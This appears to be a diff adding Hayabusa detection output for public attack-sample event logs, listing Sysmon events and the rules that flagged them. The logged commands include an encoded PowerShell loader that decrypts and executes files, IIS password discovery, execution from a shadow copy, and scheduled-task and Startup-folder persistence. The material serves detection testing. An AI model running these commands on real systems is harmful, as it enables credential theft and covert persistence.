JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1004 | PGUID: 365ABB72-3D70-5CEB-0000-001032EAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.555 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 4012 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2EDFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-28 00:12:38.241 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c whoami /groups | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3256 | PGUID: 365ABB72-FE66-5CEB-0000-001058F50B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /groups | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c whoami /groups | LID: 0x3e7 | PID: 1168 | PGUID: 365ABB72-FE66-5CEB-0000-0010C7F80B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:43.990 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-FE6B-5CEB-0000-00102A090C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:44.055 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | LID: 0x3e7 | PID: 3520 | PGUID: 365ABB72-FE6C-5CEB-0000-0010050C0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:44.055 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:45.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3876 | PGUID: 365ABB72-FE6D-5CEB-0000-0010332A0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:45.491 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-FE6D-5CEB-0000-0010122D0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:45.491 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:46.981 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\notepad.exe | PID: 1944 | PGUID: 365ABB72-FD85-5CEB-0000-00104C0E0B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:47.402 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3448 | PGUID: 365ABB72-FE6F-5CEB-0000-0010F4370C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:47.478 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-FE6F-5CEB-0000-0010D33A0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:48.655 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2412 | PGUID: 365ABB72-FE70-5CEB-0000-0010385C0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:48.763 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vssadmin List Shadows | Process: C:\Windows\System32\vssadmin.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-FE70-5CEB-0000-0010935F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:48.827 +09:00,IEWIN7,1,info,,Process Created,"Cmd: find ""Shadow Copy Volume"" | Process: C:\Windows\System32\find.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1796 | PGUID: 365ABB72-FE70-5CEB-0000-0010D65F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.447 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2356 | PGUID: 365ABB72-FE76-5CEB-0000-0010546E0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.544 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | LID: 0x3e7 | PID: 2840 | PGUID: 365ABB72-FE76-5CEB-0000-001077710C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Exec,Suspicious WMI Execution,,rules/sigma/process_creation/proc_creation_win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.632 +09:00,IEWIN7,1,info,,Process Created,Cmd: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x3e7 | PID: 1260 | PGUID: 365ABB72-FE76-5CEB-0000-001015780C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.632 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:59.519 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-FE7B-5CEB-0000-0010867F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | LID: 0x3e7 | PID: 4044 | PGUID: 365ABB72-FE7B-5CEB-0000-0010D6820C00 | Hash: SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 11:13:52.171 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 2432 | PGUID: 365ABB72-9960-5CEC-0000-0010B6981600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1968 | PGUID: 365ABB72-9960-5CEC-0000-001082AD1600 | Hash: SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:13:53.507 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: IEWIN7\IEUser | Parent Cmd: utilman.exe /debug | LID: 0x14a73 | PID: 2600 | PGUID: 365ABB72-9961-5CEC-0000-0010E1161700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:14:48.819 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 3092 | PGUID: 365ABB72-9998-5CEC-0000-00107D501700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1128 | PGUID: 365ABB72-9999-5CEC-0000-0010EB5A1700 | Hash: SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-28 11:14:50.413 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | LID: 0x14a73 | PID: 1516 | PGUID: 365ABB72-999A-5CEC-0000-0010C3A11700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx
+2019-05-29 08:09:38.589 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Startup User Shell Folder Modified | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\startup: c:\programdata\StartupNewHomeAddress | Process: C:\Windows\system32\reg.exe | PID: 1520 | PGUID: 365ABB72-BFB2-5CED-0000-0010F2C03600,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_startup_UserShellStartup_Folder_Changed_sysmon_13.evtx
